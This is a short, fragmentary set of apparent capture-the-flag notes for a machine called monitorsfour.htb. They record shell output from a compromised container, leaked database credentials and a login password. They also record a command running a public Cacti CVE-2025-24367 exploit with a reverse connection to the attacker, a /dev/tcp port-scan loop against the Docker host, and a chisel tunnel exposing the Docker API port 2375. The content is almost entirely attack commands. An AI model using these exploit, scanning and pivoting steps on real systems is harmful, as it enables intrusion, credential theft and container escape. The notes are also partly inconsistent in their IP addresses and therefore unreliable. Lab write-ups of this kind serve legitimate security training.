https://idocdown.com/app/articles/blogs/detail/17580
wonderful1


www-data@821fbd6a43fa:~/app$  ip route
 ip route
default via 172.18.0.1 dev eth0 
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.3 
www-data@821fbd6a43fa:~/app$ cat /etc/resolv.conf
cat /etc/resolv.conf
# Generated by Docker Engine.
# This file can be edited; Docker Engine will not make further changes once it
# has been modified.

nameserver 127.0.0.11
options ndots:0

# Based on host file: '/etc/resolv.conf' (internal resolver)
# ExtServers: [host(192.168.65.7)]
# Overrides: []
# Option ndots from: internal



DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r


https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC/blob/main/exploit.py

┌──(ed㉿kali)-[/tmp/CVE-2025-24367-Cacti-PoC]
└─$ python3 exploit.py  -u marcus -p wonderful1 -i 10.10.16.7 -l 8823 -url http://cacti.monitorsfour.htb




for i in {1..65535}; do (echo > /dev/tcp/192.168.65.7/$i) >/dev/null 2>&1 && echo $i is open; done

www-data@821fbd6a43fa:/$ for i in {1..65535}; do (echo > /dev/tcp/192.168.65.7/$i) >/dev/null 2>&1 && echo $i is open; done
<8.65.7/$i) >/dev/null 2>&1 && echo $i is open; done
53 is open
2375 is open
3128 is open
5555 is open

 curl 192.168.65.7 2375

 chisel client 10.10.16.7:8000 R:2375:192.168.57.7:2375
